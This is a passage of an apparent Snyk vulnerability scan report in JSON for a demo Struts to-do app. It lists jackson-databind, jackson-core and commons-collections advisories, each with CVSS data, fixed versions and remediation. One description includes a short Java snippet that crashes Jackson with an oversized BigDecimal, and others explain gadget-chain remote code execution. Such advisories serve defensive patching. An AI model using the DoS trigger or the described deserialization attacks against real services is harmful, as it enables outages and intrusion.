"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72883", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Wuguixiong" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2186", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", + "title": "GitHub Release Tag" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:04.422288Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:48:34.457712Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:20.593938Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:04.422288Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:34.457712Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `axis2-transport-jms ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19360`) is not identical to `CVE-2018-19362` and `CVE-2018-19361`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", + "epssDetails": { + "percentile": "0.81590", + "probability": "0.00788", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-19360" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-f9hv-mg5h-xcw9" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-01-03T14:17:23.673097Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-01-02T19:18:44Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-01-03T17:01:51Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:34.457712Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72884", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Wuguixiong" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2186", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", + "title": "GitHub Release Tag" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:06.110184Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:51:22.091904Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:20.548577Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:06.110184Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:51:22.091904Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `axis2-transport-jms ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19361`) is not identical to `CVE-2018-19362` and `CVE-2018-19360`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", + "epssDetails": { + "percentile": "0.81590", + "probability": "0.00788", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-19361" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-mx9v-gmh4-mgqw" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-01-03T14:17:31.715185Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-01-02T19:18:43Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-01-03T17:01:51Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:22.091904Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31519", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Alessio Soldano" + ], + "semver": { + "vulnerable": [ + "[,2.8.6)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.8.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [ + { + "version": [ + "[,2.8.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/core/json/UTF8StreamJsonParser.java", + "className": "UTF8StreamJsonParser", + "functionName": "_reportInvalidToken" + } + }, + { + "version": [ + "[,2.8.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/core/json/ReaderBasedJsonParser.java", + "className": "ReaderBasedJsonParser", + "functionName": "_reportInvalidToken" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-core", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-core/pull/322", + "title": "GitHub PR" + }, + { + "url": "https://issues.jboss.org/browse/JBEAP-6316", + "title": "Jira Issue" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:01.546686Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-core](https://github.com/FasterXML/jackson-core) is a Core Jackson abstractions, basic JSON streaming API implementation\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). If the REST endpoint consumes POST requests with JSON or XML data and data are invalid, the first unrecognized token is printed to server.log\r\n> If the first token is word of length 10MB, the whole word is printed. This is potentially dangerous and can be used to attack the server by filling the disk with logs.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-core` to version 2.8.6 or higher.\n## References\n- [GitHub PR](https://github.com/FasterXML/jackson-core/pull/322)\n- [Jira Issue](https://issues.jboss.org/browse/JBEAP-6316)\n", + "epssDetails": null, + "identifiers": { + "CVE": [], + "CWE": [ + "CWE-399" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-core", + "proprietary": false, + "creationTime": "2017-09-20T15:28:35.195000Z", + "functions_new": [ + { + "version": [ + "[,2.8.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.core.json.UTF8StreamJsonParser", + "functionName": "_reportInvalidToken" + } + }, + { + "version": [ + "[,2.8.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.core.json.ReaderBasedJsonParser", + "functionName": "_reportInvalidToken" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2017-01-12T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-core" + }, + "publicationTime": "2017-09-20T15:28:35Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-06T13:58:01.546686Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-core@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-core", + "version": "2.6.5", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31520", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "gmethwin@github" + ], + "semver": { + "vulnerable": [ + "[2.3.0-rc1,2.7.7)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.7.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [ + { + "version": [ + "[2.3.0-rc1,2.7.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/core/json/UTF8JsonGenerator.java", + "className": "UTF8JsonGenerator", + "functionName": "writeNumber" + } + }, + { + "version": [ + "[2.3.0-rc1,2.7.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/core/json/WriterBasedJsonGenerator.java", + "className": "WriterBasedJsonGenerator", + "functionName": "writeNumber" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-core", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-core/commit/96642978dcf1b69cba68ec72cb2f652d59a8b5be", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-core/issues/315", + "title": "GitHub Issue" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:48.004490Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-core](https://github.com/FasterXML/jackson-core) is a Core Jackson abstractions, basic JSON streaming API implementation\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). When `WRITE_BIGDECIMAL_AS_PLAIN` setting is enabled, Jackson will attempt to write out the whole number, no matter how large the exponent.\r\nThe following sample code will trigger an out of memory exception:\r\n```java\r\nObjectMapper mapper = new ObjectMapper().enable(JsonGenerator.Feature.WRITE_BIGDECIMAL_AS_PLAIN);\r\nmapper.writeValueAsString(new java.math.BigDecimal(\"9.223372E+1010671858\"));\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-core` to version 2.7.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-core/commit/96642978dcf1b69cba68ec72cb2f652d59a8b5be)\n- [GitHub Issue](https://github.com/FasterXML/jackson-core/issues/315)\n", + "epssDetails": null, + "identifiers": { + "CVE": [], + "CWE": [ + "CWE-399" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-core", + "proprietary": false, + "creationTime": "2017-09-20T15:28:35.195000Z", + "functions_new": [ + { + "version": [ + "[2.3.0-rc1,2.7.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.core.json.UTF8JsonGenerator", + "functionName": "writeNumber" + } + }, + { + "version": [ + "[2.3.0-rc1,2.7.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.core.json.WriterBasedJsonGenerator", + "functionName": "writeNumber" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2016-08-25T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-core" + }, + "publicationTime": "2017-09-20T15:28:35Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-06T13:55:48.004490Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-core@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-core", + "version": "2.6.5", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-COMMONSCOLLECTIONS-30078", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[3.0,3.2.2)" + ] + }, + "exploit": "High", + "fixedIn": [ + "3.2.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + "version": [ + "[3,3.2.2)" + ], + "functionId": { + "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java", + "className": "InvokerTransformer", + "functionName": "transform" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-collections:commons-collections", + "references": [ + { + "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/", + "title": "FoxGloveSecurity Blog" + }, + { + "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611", + "title": "GitHub Commit" + }, + { + "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", + "title": "Jira Issue" + }, + { + "url": "https://github.com/ianxtianxt/CVE-2015-7501", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:46:27.924934Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:52:38.421377Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:40.078866Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:27.924934Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:38.421377Z" + } + ], + "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-4852](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-6056408)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub 